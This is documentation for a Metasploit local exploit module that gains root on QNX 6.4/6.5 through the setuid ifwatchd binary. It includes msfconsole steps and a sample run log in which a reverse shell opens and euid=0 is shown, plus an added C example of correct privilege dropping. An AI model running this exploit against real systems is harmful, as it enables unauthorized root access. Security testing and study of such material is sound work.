documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md
## Vulnerable Application

This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the `ifwatchd` suid executable.

`ifwatchd` allows users to specify scripts to execute using the `-A`
command line argument; however, it does not drop privileges when
executing user-supplied scripts, resulting in execution of arbitrary
commands as root.
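As an added illustration (not `ifwatchd`'s code and not part of this module), the privilege-drop step the description says `ifwatchd` omits, written in C. The names `drop_privileges`, `privileges_dropped` and `run_user_script` are hypothetical. A setuid-root program that runs a user-chosen script should reset its identity to the invoking user in the child before `exec`, so the script runs with the caller's privileges rather than root's.

```c
/* Added example, not ifwatchd's own code: the secure-coding pattern a
 * setuid-root program should follow before executing a user-supplied
 * script. Function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Permanently drop to the real (invoking) user's identity.
 * Returns 0 on success, -1 if the drop failed or could be undone. */
int drop_privileges(void) {
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Group first: once the uid is unprivileged, setgid would fail. */
    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;

    /* Verify the drop is irreversible: for a non-root caller, a successful
     * setuid(0) here would mean the saved uid was left privileged. */
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

/* Returns 1 if the effective identity now matches the real identity. */
int privileges_dropped(void) {
    return geteuid() == getuid() && getegid() == getgid();
}

/* Run a user-supplied script, but only after dropping privileges in the
 * child. Returns the script's exit status, 127 if it could not be run
 * (or if the privilege drop failed), -1 on fork/wait error. */
int run_user_script(const char *path) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges() != 0) _exit(127);
        execl(path, path, (char *)NULL);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <script>\n", argv[0]);
        return 2;
    }
    printf("script exited with status %d\n", run_user_script(argv[1]));
    return 0;
}
```

The `setuid(0)` re-check after the drop is the part most often forgotten: on systems where `setuid()` only changes the effective uid, the saved uid stays 0 and the script could regain root. Refusing to run the script when that check succeeds turns a silent failure into a visible one.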
This module has been tested successfully on:

QNX Neutrino 6.5.0 Service Pack 1 is available here:

## Verification Steps

1. Start `msfconsole`
2. `use exploit/qnx/local/ifwatchd_priv_esc`
3. `set session <ID>`
4. `run`

## Options

**SESSION**

Which session to use, which can be viewed with `sessions`.

The module also takes a writable directory file system path (default: `/tmp`).

## Scenarios
```
msf > use exploit/qnx/local/ifwatchd_priv_esc
msf exploit(qnx/local/ifwatchd_priv_esc) > set session 1
session => 1
msf exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf exploit(qnx/local/ifwatchd_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing interface arrival event script...
[*] Executing /sbin/ifwatchd...
[*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400

id
uid=100(test) gid=100 euid=0(root)
uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
```